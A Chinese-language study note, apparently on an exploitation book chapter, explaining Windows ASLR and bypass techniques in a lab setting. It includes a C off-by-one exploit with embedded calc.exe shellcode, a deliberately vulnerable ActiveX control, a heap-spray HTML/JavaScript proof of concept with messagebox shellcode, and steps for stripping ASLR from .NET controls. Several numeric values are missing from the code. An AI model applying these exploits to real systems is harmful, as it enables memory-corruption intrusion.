OD: ASLR

ASLR，Address Space Layout Randomization，通过加载程序的时候不再使用固定的基址，从而干扰 shellcode 定位的一种保护机制，包括映像随机化、堆栈随机化、PEB 与 TEB 随机化。ASLR 的实现也需要程序和操作系统的双重支持，但程序的支持不是必须的。

ASLR 在 XP 时代已经提出来了，但 XP 上的 ASLR 功能有限，只是对 PEB 和 TEB 进行简单的随机化处理。直到 Windows Vista 出现之后 ASLR 才真正发挥作用。

支持 ASLR 的程序会在 PE 头中设置 IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE 标识。VS 2005 SP1 开始加入了 /dynamicbase 链接选项来支持 ASLR（Project - project Properties - Configuration Properties - Linker - Advanced - Randomized Base Address）。

映像随机化

对程序映像的虚拟地址进行随机处理，这个地址是在系统启动时确定的，重启后会变化。映像随机化可以通过注册表来设置：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages
DWORD:         Disabled
DWORD: -       Force Enabled
DWORD: other    Normal 

映像随机化使得通过的跳板指令无效。但映像随机化只对加载基址的前两个字节做了随机处理，各模块入口点的低位 2 字节不变。

堆栈随机化

堆栈随机化中，其基址是在每次加载程序时确定的。

jmp esp 和 heap spray 的运用使得堆栈随机化对溢出利用的影响有限。

PEB、TEB 随机化

XP SP2 中引入 PEB、TEB 的随机化，在此之前固定基址： PEB:0x7FFDF000，TEB:0x7FFDE000，获取当前 PEB 和 TEB 的参考代码如下：

 #include "stdafx.h"

 int _tmain(int argc, _TCHAR* argv[])
 {
     unsigned int teb;
     unsigned int peb;
     __asm{
         mov eax,FS:[0x18]
         mov teb,eax
         mov eax,dword ptr[eax+0x30]
         mov peb,eax
     }
     printf("peb: %#x\nteb: %#x\n",peb,teb);
     getchar();
     return ;
 }

PEB 和 TEB 随机化效果不是很好，而且溢出利用时还有其它方法获得这两个值。

利用未启用 ASLR 的模块做跳板

ASLR 是安全机制，但不是行业标准，不支持 ASLR 的程序很多。不支持 ASLR 意味着加载基址固定，如果当前进程中有这个一个模块，就可以用它做跳板。

Adobe 在 Flash 10 以后的版本才全面支持 Windows 的安全特性，在那之前一直是个危险的切入点。

书中有一个在 Vista（with flash player 9.0.262）下通过 IE 7.0（with Flash9k.ocx）绕过 ALSR 的例子：Flash9k.ocx 中没有 jmp esp 跳板，而上下文中指向栈中的只有 esp、edx、esi，能用的只有 jmp esi 了。但此时 esi 指向栈顶，栈顶的 jmp esi 跳板地址会被译成指令执行。而例子中合适的 jmp esi 指令的地址译为指令后，将会对 eax 指向的位置进行读操作，所以要先调整 eax。而调整 eax 用的跳板面临同样的问题：指令地址等效的代码不能影响 shellcode 的执行。

Off-by-One 技术攻击 ASLR

ASLR 对映像随机化时，只对加载基址的高位 2 字节做了地址随机化，因此可以利用 memcpy()、strcpy() 等进行 Off-by-One 攻击：只要寻找当前模块的踏板，并将跳板低 2 位地址覆盖到返回地址中，就可以溢出成功。

下面的例子演示了这个思路（之前的 shellcode 在 win7 上使用不了，其 LoadLibraryA() 函数出错，具体原因还没调。这里借用了 SkyLined 的弹出 calc.exe 的 shellcode，所有 32/64 bit Windows 版本通用，能够恢复栈帧，赞一个）。

 // aslr_offbyone.cpp : Defines the entry point for the console application.
 // env:
 //    * Win 7
 //    * VS2008 : GS off / Optimization off / DEP off

 #include "stdafx.h"

 char shellcode[]=
 "\x50\x54\x58\x66\x83\xE4\xF0\x50\x31\xC0\x40\x92\x74\x4F\x60\x4A"
 "\x52\x68\x63\x61\x6C\x63\x54\x59\x52\x51\x64\x8B\x72\x30\x8B\x76"
 "\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F"
 "\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x42"
 "\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF0\x8B\x74\x1F\x1C\x01"
 "\xFE\x03\x3C\xAE\xFF\xD7\x58\x58\x61\x5C\x92\x58\xC3\x50\x51\x53"
 "\x56\x57\x55\xB2\x60\x68\x63\x61\x6C\x63\x54\x59\x48\x29\xD4\x65"
 "\x48\x8B\x32\x48\x8B\x76\x18\x48\x8B\x76\x10\x48\xAD\x48\x8B\x30"
 "\x48\x8B\x7E\x30\x03\x57\x3C\x8B\x5C\x17\x28\x8B\x74\x1F\x20\x48"
 "\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x8D\x52\x02\xAD\x81\x3C"
 "\x07\x57\x69\x6E\x45\x75\xEF\x8B\x74\x1F\x1C\x48\x01\xFE\x8B\x34"
 "\xAE\x48\x01\xF7\x99\xFF\xD7\x48\x83\xC4\x68\x5D\x5F\x5E\x5B\x59"
 "\x5A\x5C\x58\xC3"              // 196 bytes of calc.exe shellcode
 "\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x38\x10"               // 0x****1038 point to call eax in main()
 ;

 char * test()
 {
     char buf[];
     memcpy(buf,shellcode,++);
     return buf;
 }

 int _tmain(int argc, _TCHAR* argv[])
 {
     test();
     _asm call eax    // eax contains buf[] returns from test
     return ;
 }

Heap Spray 攻击 ASLR

Heap Spray 是为了应对堆空间的随机化而产生的技术，ASLR 本质也是随机化处理，Heap Spray 也能应对 ASLR 保护。

Heap Spray 是攻击浏览器的技术，实验前先生成含有漏洞的浏览器 ocx 控件：MFC ActiveX Control 控件函数代码如下。

 // CvulCtrl message handlers
 // env:
 //   * windows xp sp3
 //   * visual studio 2008 mfc activex control
 //     optimization off, GS off
 //     use mfc in static library, use unicode charset
 //     build: release
 //
 void CvulCtrl::test(LPCTSTR str)
 {
     //AFX_MANAGE_STATE(AfxGetStaticModuleState());

     // TODO: Add your dispatch handler code here
     printf("bookmark\n");
     __asm{
         push eax;
         mov eax,0x20141104
         pop eax
     }
     char dest[];
     sprintf(dest, "%s", str);
 }

上述代码的第 14~19 行是调试 OllyDbg 时帮助定位的。第 11 行如果不注释的话，生成的控件在第 21 行执行完后会进行某种验证（SXS:%s called with invalid cookie type 0x........），会导致溢出实验失败。

溢出的 PoC 页面如下（Windows XP sp3 (/NOEXECUTE=OptIn) with IE7）：

 <html>
 <body>
 <object classid="clsid:DB30502B-1297-470B-A487-5D2D23967AA3" id="test"></object>
 <script>
     var shellcode="\u68FC\u0A6A\u1E38\u6368\uD189\u684F\u7432\u0C91";
     shellcode+="\uF48B\u7E8D\u33F4\uB7DB\u2B04\u66E3\u33BB\u5332";
     shellcode+="\u7568\u6573\u5472\uD233\u8B64\u305A\u4B8B\u8B0C";
     shellcode+="\u1C49\u098B\u698B\uAD08\u6A3D\u380A\u751E\u9505";
     shellcode+="\u57FF\u95F8\u8B60\u3C45\u4C8B\u7805\uCD03\u598B";
     shellcode+="\u0320\u33DD\u47FF\u348B\u03BB\u99F5\uBE0F\u3A06";
     shellcode+="\u74C4\uC108\u07CA\uD003\uEB46\u3BF1\u2454\u751C";
     shellcode+="\u8BE4\u2459\uDD03\u8B66\u7B3C\u598B\u031C\u03DD";
     shellcode+="\uBB2C\u5F95\u57AB\u3D61\u0A6A\u1E38\uA975\uDB33";
     shellcode+="\u6853\u6577\u7473\u6668\u6961\u8B6C\u53C4\u5050";
     shellcode+="\uFF53\uFC57\uFF53\uF857"; //168b msgbox shellcode

     var nops=unescape("%u9090%u9090");
     while(nops.length<0x100000/2)
         nops+=nops;
     nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
     nops=nops+shellcode;

     var memory=new Array();
     for(var i=0;i<200;i++)
         memory[i]+=nops;

     var s="\u9090";
     while(s.length<54)
         s+="\u9090";
     s+="\u0c0c\u0c0c";   // exploit return address
     //confirm("ready to exploit ...");    // debug
     test.test(s);
 </script>
 </body>
 </html>

这个实验中，vul.ocx 的 uuid 填错，折腾了很久才发现。js 中的代码写错，也折腾很久才改好。如果对 js 熟悉点，不至于耽误这么多时间调试……*_*

Hit:

* 调试时可以借助 ocx 中的标记，只要搜索 mov eax,0x20141104 或者 pop eax （用 Ctrl+B 搜）

* 在 Memory 视图中能对内存段设断点（F2），网上还有人提供了一些其它方法，如设置条件断点：点击这里

  * 书中有个利用 java applet（jdk<1.5, -target 1.1）进行 Heap Spray 来绕过 ALSR 的例子

为 .NET 控件禁用 ASLR

Alexander Sotirov 在 2008 年的 BlackHat 上披露了 PE 文件是否启用 ASLR 的校验过程：

 if ( !(pBinaryInfo->pHeaderInfo->usDllCharacteristics & IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE) &&
      !(pBinaryInfo->pHeaderInfo->bFlags & PINFO_IL_ONLY_IMAGE) &&
      !(_MnMoveImages == -) )
    {
         _MiNoRelocate++;
         return ;
    }

可见只要满足以下任意条件该 PE 文件启用 ASLR

 PE 头中含有 IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE 标识
 IL-ONLY 文件，对 .NET 进行了特殊照顾
 _MnMoveImages 值为 -，强制 ASLR

所以，不管是否设置了 IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE 标识，含有 IL-ONLY 标识的 .NET 程序/控件都会启用 ASLR。系统验证 .NET 文件是不是 IL-ONLY 的流程如下：

 if ( ( (pCORHeader->MajorRuntimeVersion>) || (pCORHeader->MajorRuntimeVersion== && pCORHeader->MinorRuntimeVersion>=) ) &&
      (pCONHeader->Flags & COMIMAGE_FLAGS_ILONLY) )
    {
         pImageControlArea->pBinaryInfo->pHeaderInfo->bFlags |= PINFO_IL_ONLY_IMAGE;
         ......
    }

系统检查一个 .NET 文件是否具有 COMIMAGE_FLAGS_ILONLY 标识前会对该文件的运行时版本进行判断，如果版本号低于 2.5，该文件就不会被认定为 IL-ONLY。

可以用 CFF Explorer 来修改 .NET 文件/控件的 PE 头，去掉 IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE 标识，然后将运行版本号改为小于 2.5 就可以。配合之前 DEP 的例子，可以用这样的 .NET 控件绕过 DEP 和 ASLR！